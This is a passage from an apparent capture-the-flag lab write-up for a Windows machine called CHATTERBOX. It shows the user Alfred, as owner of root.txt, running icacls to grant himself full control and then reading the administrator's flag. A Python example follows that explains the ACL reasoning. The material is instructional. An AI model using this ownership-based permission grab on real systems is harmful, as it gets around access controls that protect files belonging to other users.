c:\Users\Administrator\Desktop>icacls c:\Users\Administrator\Desktop
icacls c:\Users\Administrator\Desktop
c:\Users\Administrator\Desktop NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                               CHATTERBOX\Administrator:(I)(OI)(CI)(F)
                               BUILTIN\Administrators:(I)(OI)(CI)(F)
                               CHATTERBOX\Alfred:(I)(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files

Grant Alfred full access to the file.

c:\Users\Administrator\Desktop>icacls root.txt /grant alfred:F
icacls root.txt /grant alfred:F
processed file: root.txt
Successfully processed 1 files; Failed processing 0 files

Alfred has now full access.

c:\Users\Administrator\Desktop>icacls root.txt
icacls root.txt
root.txt CHATTERBOX\Alfred:(F)
         CHATTERBOX\Administrator:(F)

Successfully processed 1 files; Failed processing 0 files

The flag is readable.

c:\Users\Administrator\Desktop>type root.txt
type root.txt
<ROOT_FLAG>

Alfred is the owner of the file, which is what made the icacls /grant succeed.

c:\Users\Administrator\Desktop>dir /q root.txt
dir /q root.txt
Volume in drive C has no label.
Volume Serial Number is 9034-6528

Directory of c:\Users\Administrator\Desktop
01/15/2021  02:03 AM                34 CHATTERBOX\Alfred      root.txt
               1 File(s)             34 bytes
               0 Dir(s)  19,466,502,144 bytes free
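As an added example (not the page's own code), the Python below parses the two icacls listings from this section (constructed samples copied from the page) and spells out why the folder ACEs gave neither SYSTEM nor Alfred read access to root.txt, and why Alfred's /grant worked anyway. The path is passed in explicitly because icacls prints it in front of the first ACE with only a space as separator.

```python
# Added example (not from the original page): parse icacls output and explain
# the effective situation on root.txt from the DACLs plus the owner.
import re

# Constructed samples copied from the icacls / dir /q output on this page.
DESKTOP_PATH = r"c:\Users\Administrator\Desktop"
DESKTOP_ACL = r"""c:\Users\Administrator\Desktop NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                               CHATTERBOX\Administrator:(I)(OI)(CI)(F)
                               BUILTIN\Administrators:(I)(OI)(CI)(F)
                               CHATTERBOX\Alfred:(I)(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files
"""
ROOT_TXT_ACL = "root.txt CHATTERBOX\\Administrator:(F)\n"
ROOT_TXT_OWNER = "CHATTERBOX\\Alfred"   # from: dir /q root.txt

# One ACE: <principal>:<one or more parenthesised flag groups>
ACE_RE = re.compile(r"^(?P<who>[^:]+):(?P<flags>(?:\([A-Za-z,]+\))+)$")


def parse_icacls(output, path):
    """Return [(principal, set_of_flags), ...] from the output of 'icacls <path>'.
    The path is stripped from the first line; later lines are just indented ACEs."""
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith(path):
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if m:
            flags = set(re.findall(r"\(([A-Za-z,]+)\)", m.group("flags")))
            aces.append((m.group("who"), flags))
    return aces


def explain_access(file_aces, dir_aces, principal, owner):
    """Human-readable reasons, from the DACLs and ownership, for what the
    principal can do with the file. Only inheritance and owner rights are
    modelled; token privileges (SeTakeOwnership, SeBackup) are not."""
    notes = []
    if not any("I" in flags for _, flags in file_aces):
        notes.append("file has no (I) entries: inheritance is disabled, "
                     "the folder's (OI)(CI) ACEs do not apply to it")
    mine = [flags for who, flags in file_aces if who == principal]
    if mine:
        rights = "".join("(%s)" % f for f in sorted(mine[0]))
        notes.append("%s holds explicit %s on the file" % (principal, rights))
    else:
        notes.append("%s is absent from the file DACL: read is denied" % principal)
        if any(who == principal and "F" in flags for who, flags in dir_aces):
            notes.append("%s has (F) on the folder, enough to delete the file "
                         "(FILE_DELETE_CHILD) but not to read it" % principal)
    if owner == principal:
        notes.append("%s owns the file: READ_CONTROL and WRITE_DAC are implicit, "
                     "so 'icacls root.txt /grant' succeeds" % principal)
    return notes


if __name__ == "__main__":
    folder = parse_icacls(DESKTOP_ACL, DESKTOP_PATH)
    root = parse_icacls(ROOT_TXT_ACL, "root.txt")
    for who in ("NT AUTHORITY\\SYSTEM", "CHATTERBOX\\Alfred"):
        print(who)
        for note in explain_access(root, folder, who, ROOT_TXT_OWNER):
            print("  -", note)
```

SYSTEM gets the same "absent from the file DACL" verdict as Alfred, which matches the psexec failure above; the difference is that Alfred also owns the file. In practice SYSTEM could still take ownership with takeown, which the function deliberately does not model.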

Daniel Simao 23:35, 14 January 2021 (EST)